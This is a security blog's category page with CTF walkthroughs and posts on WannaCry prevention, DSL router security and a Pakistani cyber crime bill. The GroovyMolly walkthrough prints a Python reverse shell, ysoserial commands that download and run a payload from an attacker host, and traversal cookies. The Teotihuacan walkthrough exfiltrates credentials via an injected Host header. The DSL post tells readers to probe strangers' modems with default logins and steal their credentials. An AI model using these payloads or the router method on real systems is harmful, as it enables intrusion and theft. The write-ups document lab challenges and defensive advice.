Hacking | Taimoors Blog

« Posts under Hacking

[Sticky]

StackOverCTF – Walk Through – CyberTalents

November 15, 2022 / admin posted in General, Hacking, How Tos, Information Security, Tutorials, Walk Throughs, Write Ups / No Comments

This was one of the challenges in qualification round for Digital Pakistan Cyber Security Hackathon 2022.
Details:
Category: Web Security
Level: Hard
Points: 200

Steps:
Since this is a web challenge, open the CTF link in web browser (Google Chrome in our case).

The first page shows two links:
1) Post Question
2) Show Latest Question

The Post Question page shows a form with 3 input fields:
1) Question
2) Category
3) Animation

Enter aaaa in question field, bbbb in category and cccc in animation field.
On submission, this page sets a cookie in browser named latest_question with a base64 encoded string.

latest_question=rO0ABXNyACJjb....GFhYWE=

On Kali machine, decode this base64 encoded string:

echo rO0ABXNyACJjb....GFhYWE=|base64 -d

The decoded result is garbage with some readable strings that can be seen in image below:

Base64 Encoded Serialized Object
The presence of java/lang/String in above data confirms that this is basically a serialized java object.
Although the characters rO0 in the beginning of base64 data confirms that its a serialized object but we didn’t noticed that honestly.

Now when we visit the Show Latest Question page, aaaa was displayed.
It means that on this page, the cookie was being base64 decoded, un-serialized and our input question was being printed.

At this point, it was obvious that the vulnerability involved is Insecure Deserialization.
To exploit this vulnerability, one must understand the structure of the object being de-serialized.

To understand the structure of the Java object, we use a tool called SerializationDumper.

Save this object in a file and the use the tool to see the object structure:
echo rO0ABXNyACJjb....GFhYWE=|base64 -d>/tmp/obj01

Using SerializationDumper tool:
java -jar SerializationDumper-v1.13.jar -r /tmp/obj01

As we have the object structure, we need to find the vulnerable function which will lead to code execution.
Now we have two options: We can fuzz the web application by passing different code execution payloads or analyze the application further for possible clues.

On further analysis, a web directory /backup was observed with 2 Java source files:
QuestionController.java
QuestionDebug.java

The QuestionDebug.java file had what we were looking for, the vulnerable function:
Question Debug Java Source Code

Now we needed Java compiler so we could craft the QuestionDebug Java class.

We used Online Java Compiler from jdoodle.com for this purpose as we had no Java Compiler installed on our machine nor we had time for installation during the competition.
Jdoodle Crafted Java Object

After this, we had to generate and decode the final Java object.
Make sure to create the correct Java class hierarchy as show in images.
By using code from QuestionDebug.java and QuestionController.java files, we were able to create the final payload generator.
Jdoodle Java Payload Generator

The value of serialVersionUID should be kept same or the payload will not work.

Used requestbin.net as our HTTP listener so we can receive the output of code execution.

Open the Show Latest Question page in browser, which initially printed aaaa.

Open Developer Console of Chrome by pressing Ctrl+Shift+i and enter the final payload.
Google Chrome Developer Console Cookie

Refreshed the page and our payload got executed as we received the HTTP request on RequestBin.

Flag was present as flag.txt file in home directory.

The files used in this CTF can be download from here:
https://www.asktaimoor.com/stuff/ctf/stackoverctf.zip

If you have any questions, please feel free to ask in comments.

Thanks to CyberTalents for this great challenge 🙂

GroovyMolly – Walk Through – echoCTF

January 26, 2022 / admin posted in Hacking, Information Security, Walk Throughs, Write Ups / No Comments

IP Address: 10.0.40.34
Description: You may be thinking that Groovy Molly is random but its not…
Extra Info: Try to make the server spill the beans. You will have to combine both services to make something worthwhile…

Steps:
So we start by entering the IP Address in browser, which returns nothing.

Next step we did is Nmap Scan:
nmap -Pn -T5 -n 10.0.40.34 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-23 15:28 Pakistan Standard Time Nmap scan report for 10.0.40.34 Host is up (0.17s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 2121/tcp open ccproxy-ftp 8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 3.75 seconds

First, we will hit port 8080 because it looks like a web service port.
Opening http://10.0.40.34:8080/ in browser we get “Simple is not always Easy” text.
On checking the HTML source of this page, we see comments with our first flag: ETSCTF_x

This page has many other strings but after playing with GET,POST,SESSION and COOKIES, we got nothing.

Now we hit http://10.0.40.34:8080/test to get the web server details:
Apache Tomcat/10.0.0-M4

Looked up online for available exploits for this web server and found a PoC for “CVE-2020-9484”

For this exploit to work, we must have our file uploaded on the target system.

Moving on to the next port 2121, which looks like custom FTP port but lets netcat to make sure:
nc 10.0.40.34 2121

Above command returns “220 Service ready for new user.” which confirms that its FTP service.

Now we login to this FTP service anonymously using:
Username: anonymous
Password: root@localhost

Once logged in, we get two files in the FTP folder:
One is our second flag ETSCTF_xx
The other one is a “README.txt” file with the text:
Default user root directory.PWD:/opt/apache-ftpserver-1.1.1/res/home/

We now know that the FTP Server running is Apache FTP Server with version 1.1.1

Now we tried to upload files on the FTP server which gave “Permission Denied” errors means anonymous users don’t have enough rights.

Looked for Apache FTP Server 1.1.1 exploits online but nothing worked.

Downloaded Apache FTP Server 1.1.1 to see if we can get any further clues.

Looking at the configuration files, we got the default credentials:
Username: admin
Password: admin

Logging in to the FTP Server, now we can write files.

We have to generate our stager payload files that we will upload on the FTP service to make this exploit work.

On our Kali machine we create a file named “payload.sh” with the following content:
#!/usr/bin/bash python -c 'import

socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.54",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

In the same directory, we have to run this command so we can transfer our final payload to the target server:
python -m SimpleHTTPServer 8888

Downloaded “ysoserial” and ran these commands for generating stager payload files:
java -jar ysoserial.jar Groovy1 'curl http://10.10.0.54:8888/payload.sh -o /tmp/payload.sh' > downloadPayload.session

java -jar ysoserial.jar Groovy1 ‘chmod 777 /tmp/payload.sh’ > chmodPayload.session

java -jar ysoserial.jar Groovy1 'bash /tmp/payload.sh' > executePayload.session

We changed the default transfer mode of FTP service to binary mode otherwise the exploit doesn’t work.

Run our Netcat listener on attacker machine using:
nc -nlvp 80

Uploaded these three stager payload files on FTP Server and now we run the Tomcat exploit as discussed above:
curl 'http://10.0.40.34:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/apache-ftpserver-1.1.1/res/home/downloadPayload'

curl ‘http://10.0.40.34:8080/index.jsp’ -H ‘Cookie: JSESSIONID=../../../../../opt/apache-ftpserver-1.1.1/res/home/chmodPayload’

curl 'http://10.0.40.34:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/apache-ftpserver-1.1.1/res/home/executePayload'

As soon as we run the last curl command, we get our Netcat reverse connection and guess what, Tomcat is run by default as root 🙂

Since we are root, we easily get our remaining flags using these commands:
cat /etc/passwd | grep ETSCTF -> ETSCTF_xxx cat /etc/shadow | grep ETSCTF -> ETSCTF_xxxx ls -lah /root/ | grep ETSCTF -> ETSCTF_xxxxx env | grep ETSCTF -> ETSCTF_xxxxxx

That’s all.

If you feel something is confusing, please feel free to write in comments.

Thanks to echoCTF for providing this interesting challenge 🙂

Notes:
1- Replace the “10.10.0.54” with your attacker IP Address.
3- Simple bash reverse shell variations didn’t work for some reason and only Python shell worked.
2- Had to get hint from Discord channel regarding the “binary mode” switching in FTP service.

Teotihuacan – Walk Through – echoCTF

January 18, 2022 / admin posted in Hacking, Information Security, Tutorials, Walk Throughs, Write Ups / No Comments

IP Address: 10.0.30.190
Description: Just like the pyramids of Teotihuacán, this target feels like a step-pyramid
Extra Info: Just like a step-pyramid from Teotihuacán, you have to climb step-by-step until you reach the top. You have to get the following flags

Steps:
Like any other target, we start by simply entering the IP Address in browser.
Opening http://10.0.30.190/ returns a PHP code and anyone with basic PHP skills know what this code does.
Now we enter http://10.0.30.190/?hasAdminAccess=true in browser to get our first flag.
ETSCTF_x

Along with the flag, we got a message that says “The next challenge is located at switch_and_twist” and a link to http://10.0.30.190/switch_and_twist/

Now again we have a piece of PHP code but this time it requires some intermediate PHP skills to understand what this code does.

Using Postman, we have to send the below request:
http://10.0.30.190/switch_and_twist/
hmac=” ”
host=”asdasdasd”
nonce=””
Note: I had to debug this PHP code on local Apache to fully understand its logic.

Now we got our second flag ETSCTF_xx with the message “The next challenge is located at overprinting” and a link to http://10.0.30.190/overprinting/

Again, we are presented with PHP code and this time, it requires basic arithmetic knowledge along with advanced PHP understanding.

After some hit and try, playing with this PHP code on local Apache, we finally get the code required to pass this challenge.
http://10.0.30.190/overprinting/?print=print=111111

As a result, we get our third flag:
“The next challenge is located at /got_creds/ ETSCTF_xxx”

If you really know PHP well, you will notice another logic in this code and so we found another code:
http://10.0.30.190/overprinting/?print=011111

As expected, this code gives us our fourth flag:
“Awesome work, here is anothe flag for your troubles ETSCTF_xxxx”

Now we hit http://10.0.30.190/got_creds/ and get some NodeJS code.
This code is fairly simple and doesn’t require any deep NodeJS skills.

From the NodeJS code we get a link to http://10.0.30.190/got_creds/example

Upon hitting the above link, we get a JSON response with our fifth flag:
{“body”:{“ETSCTF”:”ETSCTF_xxxxx”}}

Now we have no more hints and there is something to do with this NodeJS code:
Upon close inspection, we see a call:
http.get(`http://${req.headers.host}?auth=${JSON.stringify(credentials)}`

Using Postman, we have to send request to http://10.0.30.190/got_creds/example with the “Host” header set to our attacker IP which in our case is “10.10.0.123”

Before sending the above request, we have to run a netcat listener on our attacker machine using the command:
nc -nlvp 80

As soon as we send the request from Postman, we get our sixth and final flag on netcat listener:
ETSCTF_xxxxxx

That’s all.

If you feel something is confusing, please feel free to write in comments.

Thanks to echoCTF for providing this CTF 🙂

WannaCrypt Ransomware: Prevention and Cure

May 15, 2017 / admin posted in General, Hacking, Information Security / 2 Comments

As they say, prevention is better than cure, so its better safe than sorry!

In this case, there is currently “no cure” so we are only left with prevention.

WannaCrypt/WannaCry/Wcry is a new ransomware which exploits the latest SMB vulnerability (MS17-010) found in Windows machines.

More details about this exploit and how it spreads are available everywhere so lets jump to the prevention part.

Since this code spreads via SMB which uses port 445, we have to close port 445 on our Windows systems.

Below are steps to close down port 445 and prevent WannaCrypt ransomware infection:

Disable NetBIOS
First of all you need to disable NetBIOS (port 137,138 and 139).

Got to Start menu > Control Panel and open System.

In Hardware tab, click the Device Manager button.

Click Show Hidden Devices from the View menu.

Expand Non-Plug And Play Drivers.

Right-click NetBios Over Tcpip and select Disable.

Close all dialogs and restart the system.

Uninstall SMB
SMB uses port 139 and sometimes 445 so we need to uninstall this service.

Go to Start menu > Control Panel and open Network Connections.

One by one select your network interfaces (i.e., Local Area Network) and select Properties.

Select Client For Microsoft Networks and click the Uninstall button.

Once the uninstall finishes, select File And Printer Sharing For Microsoft Networks and click the Uninstall button.

Repeat these steps for all network interfaces.

Close all dialogs and restart the system.

These steps are only meant to prevent WannaCrypt to infect your system. If the system is already infected, isolate the system from network so it doesn’t infect other machines on your network and wait until the *cure* arrives.

Best of luck 🙂

Hacking and Securing DSL Routers

July 9, 2015 / admin posted in General, Hacking, Information Security, ISP, Telecom, Tutorials / 4 Comments

Introduction:
(Note: If you know how DSL works, you can jump to the next section!)
Most of the internet users nowadays are using DSL connections. DSL stands for Digital Subscriber Line which provides internet over telephone lines. DSL uses ADSL Routers or ADSL Modems. Here is a layman diagram of how DSL works:

Whenever a user turns on their DSL modem, they are connected to the DSLAM which is usually placed inside ISP Exchange. Each DSLAM has the capacity to connect with thousands of DSL users. In above image, it looks like a small box but actually it is much bigger:

DSLAM is responsible for checking the condition of telephone line and assures that a stable connection can be maintained. It also holds some properties for each telephone line. The Download and Upload Rate you see in your modem status page are also set by DSLAM. Once the DSLAM connection is established, the DSL light on some modems is turned on.

Now the modem sends Internet Access request to the BRAS server. This request contains the DSL username and password which is saved in the DSL modem settings. The login is usually set by the lineman when they install a new DSL connection. The BRAS server is directly connected with the central RADIUS server which contains login information of all DSL users. The RADIUS server also contains a list of IP Addresses which are not used by others. If the login sent by modem is valid, RADIUS server responds with one IP Address from the IP Address list. Once the modem receives the IP Address, an internet connection is established and the internet light on modem is turned on:

That was some lengthy introduction about DSL and its working for non-technical people!

How to Hack:
After reading the above introduction we know that each DSL connection is assigned a unique Public IP address from a list. This list is basically a range of IP Addresses which is assigned to the ISP by the RIR. We can check our IP Address from here: http://myip.counterstrike.com.pk/. I assume my IP Address is 66.150.150.10. The IP Address we see is basically the IP Address assigned to our modem. What will happen if we change the last part of our IP Address and enter 66.150.150.11 it in web browser?

Oh. It looks like that IP Address does not belong to any DSL user. Lets try 66.150.150.11:

(Keep increasing the last number of IP Address until you hit a login page. Don’t give up too soon!)

Looks like we have reached the login page of another DSL users’s modem. The default login for most modems is admin:admin. More default logins are given in next section. Once we login successfully, we have full control over that modem.
For example:

We can steal their DSL login and use their bandwidth:
Change their DNS Servers and hijack their DNS Requests:
Steal their Wi-Fi keys:
Enable DMZ to remotely access internal LAN computers:
Replace ACS with our own for remote configuration of modem:
Replace modem’s firmware with our own backdoored firmware:

As you can see, we can do pretty much anything we want with that DSL Router we just owned.

How to Secure:
Now that we have learned about the various tricks to exploit the router, lets go through the different ways to secure it:

Change Default Router Configuration Password:
If you have installed a new DSL connection, chances are that your login and password combination is one of the following default logins:
admin:admin
support:support
user:user
admin:ISP NAME
admin:LAST 5 HEX CHARACTERS OF MODEM MAC ADDRESS+1
Always use a strong password that does not include dictionary words.
Some modems have multiple login accounts so make sure you have changed passwords for all of them:
Change Default DSL Connection Password:
Call your ISP helpline and ask them to change your DSL or Broadband or PPP account password.
If you do not change it, someone else might use it and you will be billed for their download usage.
Disable Remote Access to Modem:
This is to make sure no one can connect to your router from outside your network.
Disable TR-069 Client:
If you know how to configure your router, you don’t need your ISP to remotely access your router.
So you can simply disable it.
Use Strong Wi-FI Password:
Always use a strong WPA/PSK key for password. If the attacker is on LAN, means they have your Wi-Fi password, they can easily sniff your router credentials using MITM on your local network.
Be Smart:
If you connect to your Wi-Fi network and the browser opens a page asking for your Wi-Fi password, beware! Someone is trying to hack your Wi-Fi password using Wi-Fi Phishing. This is a new technique and it cannot be prevented directly. All you can do is educate your friends and family about how this works so they should be cautious about these attacks.

If you follow the above steps, no one can break in to your router remotely or locally.

Conclusion:
The sole purpose of writing this post was to spread awareness about security and to educate the internet users and the ISP operators about the different threats they are exposed to.
So if you suspect that your router might be vulnerable, now is the right time to secure it.

Better safe than sorry!

Cyber Crime Bill in Pakistan: The Bright Side

June 26, 2015 / admin posted in General, Hacking, Information Security, ISP, Telecom / No Comments

If you belong to Pakistan you might have seen the recent fuss about the “Controversial Cyber Crime Bill” that will snatch the basic rights of internet users.
This bill will take away everything including your internet privacy, freedom of speech and liberty. Once passed, it will be a cyber apocalypse for Pakistan.
At least this is what the media is projecting about that bill.

Below are a few texts quoted from various social and mainstream media sources:

If you send someone a message or email without their permission, you are a criminal.
Posting someones image online without their consent will land you in jail.
It will be a crime to write anything online against government or politicians.
Police or any other agency will be allowed to pick anyone without arrest warrants.
Government will block any website they want for any reason.
Internet in hotels and cafes will be banned.

A few facts to keep in mind before I go any further:

Criminals are now using internet as a weapon for blackmailing the vulnerable. Victims often commit suicide in serious cases. If these criminals are ever caught, they are released most of the times because there are no laws that properly define those crimes.
Criminals mostly use open WiFi networks and cybercafés.
Pakistan government has already deployed a nationwide web filter which blocks adult websites, blasphemous material and anything that seems inappropriate to them. Government has used this system to block many legitimate websites without revealing any reasons. So this is nothing new that is going to happen.
Government agencies have powers to arrest anyone without requiring any arrest warrants but only when it is necessary. When they have solid intelligence about illegal activities and when national security at stake.

Well, this media is a paid mind control machine. They are a modern form of black magic. You pay them good and they will turn everything in your favor. From spoiling someones reputation using scandals to violent strikes, this media plays the role of a positive catalyst. I am talking about mainstream media, the TV channels and the newspapers. Social media is not that mature yet. In our case it looks like some people don’t want to see these Cyber Crime Laws implemented.

More details about mind manipulation by media and the methods used can be found on these links:

10 Strategies of Manipulation” by the Media

Silent Weapons for Quiet Wars

The whole point of this post is that we should not blindly believe in what we are shown by media. We must research at our own before supporting or opposing anything.

Taimoors Blog